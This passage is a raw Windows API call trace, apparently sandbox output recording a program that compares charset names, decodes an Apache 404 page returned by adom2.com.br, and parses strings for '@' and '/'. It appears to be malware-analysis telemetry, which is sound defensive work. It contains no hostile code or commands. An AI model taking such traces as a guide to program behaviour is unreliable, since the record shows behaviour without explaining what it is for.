cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM903", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp903", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM903", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM904", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp904", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="904", cchCount1=3, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBBM904", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM905", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP905", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-tr", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM905", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM918", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP918", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-cp-ar2", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM918", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM1026", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP1026", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBM1026", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-AT-DE", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csIBMEBCDICATDE", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-AT-DE-A", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICATDEA", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-CA-FR", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICCAFR", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-DK-NO", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICDKNO", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-DK-NO-A", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICDKNOA", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-FI-SE", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICFISE", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-FI-SE-A", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICFISEA", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-FR", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICFR", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-IT", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICIT", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-PT", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICPT", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-ES", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICES", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-ES-A", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICESA", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-ES-S", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICESS", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-UK", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICUK", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EBCDIC-US", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEBCDICUS", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UNKNOWN-8BIT", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csUnknown8BiT", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MNEMONIC", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csMnemonic", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MNEM", cchCount1=4, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csMnem", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VISCII", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 3 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csVISCII", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VIQR", cchCount1=4, lpString2="utf-8", cchCount2=5) returned 3 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csVIQR", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KOI8-R", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csKOI8R", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KOI8-U", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM00858", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCSID00858", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP00858", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PC-Multilingual-850+euro", cchCount1=24, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM00924", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCSID00924", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP00924", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-Latin9--euro", cchCount1=19, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM01140", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCSID01140", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP01140", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-us-37+euro", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM01141", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCSID01141", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP01141", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-de-273+euro", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM01142", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCSID01142", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP01142", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-dk-277+euro", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-no-277+euro", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM01143", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCSID01143", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP01143", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-fi-278+euro", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-se-278+euro", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM01144", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCSID01144", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP01144", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-it-280+euro", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM01145", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCSID01145", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP01145", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-es-284+euro", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM01146", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.734] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCSID01146", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP01146", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-gb-285+euro", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM01147", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCSID01147", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP01147", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-fr-297+euro", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM01148", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCSID01148", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP01148", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-international-500+euro", cchCount1=29, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM01149", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCSID01149", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP01149", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebcdic-is-871+euro", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Big5-HKSCS", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-16BE", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-16LE", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-16", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CESU-8", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csCESU-8", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-32", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-32BE", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-32LE", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UNICODE-1-1-UTF-7", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csUnicode11UTF7", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-8", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 2 [0221.735] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x68ff43c | out: lpCPInfo=0x68ff43c) returned 1 [0221.735] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x70f6af8, cbMultiByte=1057, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1057 [0221.736] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x70f6af8, cbMultiByte=1057, lpWideCharStr=0x7100b5c, cchWideChar=1057 | out: lpWideCharStr="\r\n\r\n\r\n\r\nObject not found!\r\n\r\n\r\n\r\n\r\n\r\n

Object not found!

\r\n

\r\n\r\n\r\n The requested URL was not found on this server.\r\n\r\n \r\n\r\n If you entered the URL manually please check your\r\n spelling and try again.\r\n\r\n \r\n\r\n

\r\n

\r\nIf you think this is a server error, please contact\r\nthe webmaster.\r\n\r\n

\r\n\r\n

Error 404

\r\n
\r\n adom2.com.br
\r\n Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.23\r\n
\r\n\r\n\r\n\r\n") returned 1057 [0221.736] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x68ff4e0) [0221.737] RtlUnwind (TargetFrame=0x68ff65c, TargetIp=0x6ba8130, ExceptionRecord=0x68fefec, ReturnValue=0x0) [0221.737] select (in: nfds=0, readfds=0x68fe8dc, writefds=0x0, exceptfds=0x0, timeout=0x68fe8c4 | out: readfds=0x68fe8dc, writefds=0x0, exceptfds=0x0) returned 0 [0221.738] select (in: nfds=0, readfds=0x68fe8dc, writefds=0x0, exceptfds=0x0, timeout=0x68fe8c4 | out: readfds=0x68fe8dc, writefds=0x0, exceptfds=0x0) returned 0 [0221.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="CLOSE", cchCount2=5) returned 1 [0221.738] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="CLOSE", cchCount2=5) returned 1 [0221.739] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0221.739] IsWindowUnicode (hWnd=0x40148) returned 1 [0221.739] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0221.739] GetCapture () returned 0x0 [0221.739] GetWindowThreadProcessId (in: hWnd=0x40148, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0221.739] GetCurrentProcessId () returned 0x4f0 [0221.739] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0221.739] GetPropW (hWnd=0x40148, lpString=0xc031) returned 0x0 [0221.739] GetParent (hWnd=0x40148) returned 0x0 [0221.739] TranslateMessage (lpMsg=0x68ff884) returned 0 [0221.739] DispatchMessageW (lpMsg=0x68ff884) returned 0x0 [0221.739] GetForegroundWindow () returned 0x10166 [0221.739] GetClassNameW (in: hWnd=0x10166, lpClassName=0x68ff44e, nMaxCount=256 | out: lpClassName="TFrmMwM41n") returned 10 [0221.739] GetWindowTextW (in: hWnd=0x10166, lpString=0x68ff4f0, nMaxCount=256 | out: lpString="k8w0") returned 4 [0221.739] CallWindowProcW (lpPrevWndFunc=0x6bafc8c, hWnd=0x10166, Msg=0xd, wParam=0x100, lParam=0x68ff4f0) returned 0x4 [0221.739] GetCurrentThreadId () returned 0xc04 [0221.739] GetCurrentThreadId () returned 0xc04 [0221.739] GetCurrentThreadId () returned 0xc04 [0221.739] GetCurrentThreadId () returned 0xc04 [0221.739] GetCurrentThreadId () returned 0xc04 [0221.739] GetCurrentThreadId () returned 0xc04 [0221.739] GetLocalTime (in: lpSystemTime=0x68ff314 | out: lpSystemTime=0x68ff314*(wYear=0x7e0, wMonth=0x9, wDayOfWeek=0x5, wDay=0x2, wHour=0x9, wMinute=0x3b, wSecond=0x3, wMilliseconds=0x2b4)) [0221.739] InvalidateRect (hWnd=0x10166, lpRect=0x68ff18c, bErase=1) returned 1 [0221.740] GetDC (hWnd=0x0) returned 0x120101d2 [0221.740] MoveToEx (in: hdc=0x120101d2, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0221.740] SelectObject (hdc=0x120101d2, h=0x130a01ce) returned 0x18a002e [0221.740] GetSysColor (nIndex=8) returned 0x0 [0221.740] SetTextColor (hdc=0x120101d2, color=0x0) returned 0x0 [0221.740] SelectObject (hdc=0x120101d2, h=0x1f3001b7) returned 0x1b00017 [0221.740] SetROP2 (hdc=0x120101d2, rop2=13) returned 13 [0221.740] UnrealizeObject (h=0x17100741) returned 1 [0221.740] SelectObject (hdc=0x120101d2, h=0x17100741) returned 0x1900010 [0221.740] SetBkColor (hdc=0x120101d2, color=0xffffff) returned 0xffffff [0221.740] SetBkMode (hdc=0x120101d2, mode=2) returned 2 [0221.740] GetSysColor (nIndex=8) returned 0x0 [0221.740] GetSysColor (nIndex=14) returned 0xffffff [0221.740] DrawThemeTextEx () returned 0x0 [0221.740] SelectObject (hdc=0x120101d2, h=0x1b00017) returned 0x1f3001b7 [0221.740] SelectObject (hdc=0x120101d2, h=0x1900015) returned 0x17100741 [0221.740] SelectObject (hdc=0x120101d2, h=0x18a002e) returned 0x130a01ce [0221.740] GetCurrentPositionEx (in: hdc=0x120101d2, lppt=0x68ff15c | out: lppt=0x68ff15c) returned 1 [0221.740] ReleaseDC (hWnd=0x0, hDC=0x120101d2) returned 1 [0221.740] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x68ff884) returned 1 [0221.740] IsWindowUnicode (hWnd=0x10164) returned 1 [0221.740] PeekMessageW (in: lpMsg=0x68ff884, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x68ff884) returned 1 [0221.740] GetCapture () returned 0x0 [0221.740] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x68ff848 | out: lpdwProcessId=0x68ff848) returned 0xc04 [0221.741] GetCurrentProcessId () returned 0x4f0 [0221.741] GlobalFindAtomW (lpString="ControlOfs06BA000000000C04") returned 0xc031 [0221.741] GetPropW (hWnd=0x10164, lpString=0xc031) returned 0x0 [0221.741] GetParent (hWnd=0x10164) returned 0x0 [0221.741] TranslateMessage (lpMsg=0x68ff884) returned 0 [0221.741] DispatchMessageW (lpMsg=0x68ff884) [0221.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff505, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0221.741] GetCurrentThreadId () returned 0xc04 [0221.741] GetCurrentThreadId () returned 0xc04 [0221.741] GetCurrentThreadId () returned 0xc04 [0221.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0221.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="/", cchCount2=1) returned 1 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2="/", cchCount2=1) returned 3 